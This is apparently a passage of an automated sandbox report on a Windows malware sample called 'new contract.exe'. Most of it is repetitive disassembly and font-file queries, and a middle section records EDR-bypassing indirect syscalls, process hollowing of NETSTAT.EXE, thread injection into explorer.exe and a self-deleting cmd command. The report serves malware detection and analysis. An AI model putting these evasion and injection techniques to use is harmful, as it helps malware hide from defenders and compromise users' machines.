          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016329A0 mov eax, dword ptr fs:[00000030h]2_2_016329A0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016329A0 mov eax, dword ptr fs:[00000030h]2_2_016329A0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016209AD mov eax, dword ptr fs:[00000030h]2_2_016209AD
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016209AD mov eax, dword ptr fs:[00000030h]2_2_016209AD
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016A89B3 mov esi, dword ptr fs:[00000030h]2_2_016A89B3
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016A89B3 mov eax, dword ptr fs:[00000030h]2_2_016A89B3
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016A89B3 mov eax, dword ptr fs:[00000030h]2_2_016A89B3
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016AE872 mov eax, dword ptr fs:[00000030h]2_2_016AE872
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016AE872 mov eax, dword ptr fs:[00000030h]2_2_016AE872
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016B6870 mov eax, dword ptr fs:[00000030h]2_2_016B6870
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016B6870 mov eax, dword ptr fs:[00000030h]2_2_016B6870
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01632840 mov ecx, dword ptr fs:[00000030h]2_2_01632840
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01650854 mov eax, dword ptr fs:[00000030h]2_2_01650854
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01624859 mov eax, dword ptr fs:[00000030h]2_2_01624859
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01624859 mov eax, dword ptr fs:[00000030h]2_2_01624859
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01642835 mov eax, dword ptr fs:[00000030h]2_2_01642835
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01642835 mov eax, dword ptr fs:[00000030h]2_2_01642835
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01642835 mov eax, dword ptr fs:[00000030h]2_2_01642835
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01642835 mov ecx, dword ptr fs:[00000030h]2_2_01642835
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01642835 mov eax, dword ptr fs:[00000030h]2_2_01642835
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01642835 mov eax, dword ptr fs:[00000030h]2_2_01642835
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0165A830 mov eax, dword ptr fs:[00000030h]2_2_0165A830
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016C483A mov eax, dword ptr fs:[00000030h]2_2_016C483A
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016C483A mov eax, dword ptr fs:[00000030h]2_2_016C483A
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016AC810 mov eax, dword ptr fs:[00000030h]2_2_016AC810
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016EA8E4 mov eax, dword ptr fs:[00000030h]2_2_016EA8E4
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0165C8F9 mov eax, dword ptr fs:[00000030h]2_2_0165C8F9
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0165C8F9 mov eax, dword ptr fs:[00000030h]2_2_0165C8F9
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0164E8C0 mov eax, dword ptr fs:[00000030h]2_2_0164E8C0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016F08C0 mov eax, dword ptr fs:[00000030h]2_2_016F08C0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01620887 mov eax, dword ptr fs:[00000030h]2_2_01620887
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016AC89D mov eax, dword ptr fs:[00000030h]2_2_016AC89D
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0161CB7E mov eax, dword ptr fs:[00000030h]2_2_0161CB7E
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016D4B4B mov eax, dword ptr fs:[00000030h]2_2_016D4B4B
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016D4B4B mov eax, dword ptr fs:[00000030h]2_2_016D4B4B
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016B6B40 mov eax, dword ptr fs:[00000030h]2_2_016B6B40
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016B6B40 mov eax, dword ptr fs:[00000030h]2_2_016B6B40
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016EAB40 mov eax, dword ptr fs:[00000030h]2_2_016EAB40
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016C8B42 mov eax, dword ptr fs:[00000030h]2_2_016C8B42
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01618B50 mov eax, dword ptr fs:[00000030h]2_2_01618B50
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016F2B57 mov eax, dword ptr fs:[00000030h]2_2_016F2B57
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016F2B57 mov eax, dword ptr fs:[00000030h]2_2_016F2B57
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016F2B57 mov eax, dword ptr fs:[00000030h]2_2_016F2B57
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016F2B57 mov eax, dword ptr fs:[00000030h]2_2_016F2B57
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016CEB50 mov eax, dword ptr fs:[00000030h]2_2_016CEB50
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0164EB20 mov eax, dword ptr fs:[00000030h]2_2_0164EB20
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0164EB20 mov eax, dword ptr fs:[00000030h]2_2_0164EB20
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016E8B28 mov eax, dword ptr fs:[00000030h]2_2_016E8B28
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016E8B28 mov eax, dword ptr fs:[00000030h]2_2_016E8B28
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016F4B00 mov eax, dword ptr fs:[00000030h]2_2_016F4B00
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0169EB1D mov eax, dword ptr fs:[00000030h]2_2_0169EB1D
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0169EB1D mov eax, dword ptr fs:[00000030h]2_2_0169EB1D
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0169EB1D mov eax, dword ptr fs:[00000030h]2_2_0169EB1D
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0169EB1D mov eax, dword ptr fs:[00000030h]2_2_0169EB1D
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0169EB1D mov eax, dword ptr fs:[00000030h]2_2_0169EB1D
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0169EB1D mov eax, dword ptr fs:[00000030h]2_2_0169EB1D
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0169EB1D mov eax, dword ptr fs:[00000030h]2_2_0169EB1D
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0169EB1D mov eax, dword ptr fs:[00000030h]2_2_0169EB1D
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0169EB1D mov eax, dword ptr fs:[00000030h]2_2_0169EB1D
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01628BF0 mov eax, dword ptr fs:[00000030h]2_2_01628BF0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01628BF0 mov eax, dword ptr fs:[00000030h]2_2_01628BF0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01628BF0 mov eax, dword ptr fs:[00000030h]2_2_01628BF0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0164EBFC mov eax, dword ptr fs:[00000030h]2_2_0164EBFC
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016ACBF0 mov eax, dword ptr fs:[00000030h]2_2_016ACBF0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01640BCB mov eax, dword ptr fs:[00000030h]2_2_01640BCB
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01640BCB mov eax, dword ptr fs:[00000030h]2_2_01640BCB
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01640BCB mov eax, dword ptr fs:[00000030h]2_2_01640BCB
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01620BCD mov eax, dword ptr fs:[00000030h]2_2_01620BCD
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01620BCD mov eax, dword ptr fs:[00000030h]2_2_01620BCD
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01620BCD mov eax, dword ptr fs:[00000030h]2_2_01620BCD
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016CEBD0 mov eax, dword ptr fs:[00000030h]2_2_016CEBD0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01630BBE mov eax, dword ptr fs:[00000030h]2_2_01630BBE
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01630BBE mov eax, dword ptr fs:[00000030h]2_2_01630BBE
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016D4BB0 mov eax, dword ptr fs:[00000030h]2_2_016D4BB0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016D4BB0 mov eax, dword ptr fs:[00000030h]2_2_016D4BB0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0165CA6F mov eax, dword ptr fs:[00000030h]2_2_0165CA6F
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0165CA6F mov eax, dword ptr fs:[00000030h]2_2_0165CA6F
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0165CA6F mov eax, dword ptr fs:[00000030h]2_2_0165CA6F
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016CEA60 mov eax, dword ptr fs:[00000030h]2_2_016CEA60
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0169CA72 mov eax, dword ptr fs:[00000030h]2_2_0169CA72
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0169CA72 mov eax, dword ptr fs:[00000030h]2_2_0169CA72
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01626A50 mov eax, dword ptr fs:[00000030h]2_2_01626A50
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01626A50 mov eax, dword ptr fs:[00000030h]2_2_01626A50
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01626A50 mov eax, dword ptr fs:[00000030h]2_2_01626A50
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01626A50 mov eax, dword ptr fs:[00000030h]2_2_01626A50
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01626A50 mov eax, dword ptr fs:[00000030h]2_2_01626A50
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01626A50 mov eax, dword ptr fs:[00000030h]2_2_01626A50
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01626A50 mov eax, dword ptr fs:[00000030h]2_2_01626A50
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01630A5B mov eax, dword ptr fs:[00000030h]2_2_01630A5B
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01630A5B mov eax, dword ptr fs:[00000030h]2_2_01630A5B
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0165CA24 mov eax, dword ptr fs:[00000030h]2_2_0165CA24
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0164EA2E mov eax, dword ptr fs:[00000030h]2_2_0164EA2E
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01644A35 mov eax, dword ptr fs:[00000030h]2_2_01644A35
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01644A35 mov eax, dword ptr fs:[00000030h]2_2_01644A35
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016ACA11 mov eax, dword ptr fs:[00000030h]2_2_016ACA11
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0165AAEE mov eax, dword ptr fs:[00000030h]2_2_0165AAEE
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0165AAEE mov eax, dword ptr fs:[00000030h]2_2_0165AAEE
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01676ACC mov eax, dword ptr fs:[00000030h]2_2_01676ACC
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01676ACC mov eax, dword ptr fs:[00000030h]2_2_01676ACC
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01676ACC mov eax, dword ptr fs:[00000030h]2_2_01676ACC
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01620AD0 mov eax, dword ptr fs:[00000030h]2_2_01620AD0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01654AD0 mov eax, dword ptr fs:[00000030h]2_2_01654AD0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01654AD0 mov eax, dword ptr fs:[00000030h]2_2_01654AD0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01628AA0 mov eax, dword ptr fs:[00000030h]2_2_01628AA0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01628AA0 mov eax, dword ptr fs:[00000030h]2_2_01628AA0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01676AA4 mov eax, dword ptr fs:[00000030h]2_2_01676AA4
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0162EA80 mov eax, dword ptr fs:[00000030h]2_2_0162EA80
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0162EA80 mov eax, dword ptr fs:[00000030h]2_2_0162EA80
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_00682167 GetProcessHeap,htons,htons,InternalGetTcpTableWithOwnerModule,htons,htons,InternalGetTcpTable2,htons,htons,HeapFree,InternalGetBoundTcpEndpointTable,htons,htons,HeapFree,htons,htons,InternalGetTcp6TableWithOwnerModule,htons,htons,InternalGetTcp6Table2,htons,htons,HeapFree,InternalGetBoundTcp6EndpointTable,htons,htons,HeapFree,InternalGetUdpTableWithOwnerModule,htons,HeapFree,InternalGetUdp6TableWithOwnerModule,htons,HeapFree,5_2_00682167
          Source: C:\Users\user\Desktop\new contract.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_00685DC0 SetUnhandledExceptionFilter,5_2_00685DC0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_00685C30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00685C30
          Source: C:\Users\user\Desktop\new contract.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Found direct / indirect Syscall (likely to bypass EDR)
          Source: C:\Users\user\Desktop\new contract.exeNtQueueApcThread: Indirect: 0x117A4F2Jump to behavior
          Source: C:\Users\user\Desktop\new contract.exeNtClose: Indirect: 0x117A56C
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\new contract.exeMemory written: C:\Users\user\Desktop\new contract.exe base: 400000 value starts with: 4D5AJump to behavior
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\new contract.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeSection loaded: NULL target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeSection loaded: NULL target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\new contract.exeThread register set: target process: 2580Jump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEThread register set: target process: 2580Jump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\new contract.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\new contract.exeSection unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: 680000Jump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: memset,OpenProcess,K32GetModuleBaseNameW,CompareStringW,CompareStringW,GetSystemDirectoryW,LoadLibraryExW,GetProcAddress,K32GetModuleBaseNameW,CloseHandle,LocalFree,FreeLibrary, svchost.exe5_2_006838D2
          Source: C:\Users\user\Desktop\new contract.exeProcess created: C:\Users\user\Desktop\new contract.exe "C:\Users\user\Desktop\new contract.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\new contract.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_006858B6 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,5_2_006858B6
          Source: explorer.exe, 00000003.00000000.1745096473.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1752045440.0000000009815000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4137734556.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000003.00000002.4129623359.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1743754861.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000003.00000000.1743468048.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4129060379.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1Progman$
          Source: explorer.exe, 00000003.00000002.4129623359.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1743754861.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000003.00000002.4129623359.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1743754861.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Users\user\Desktop\new contract.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
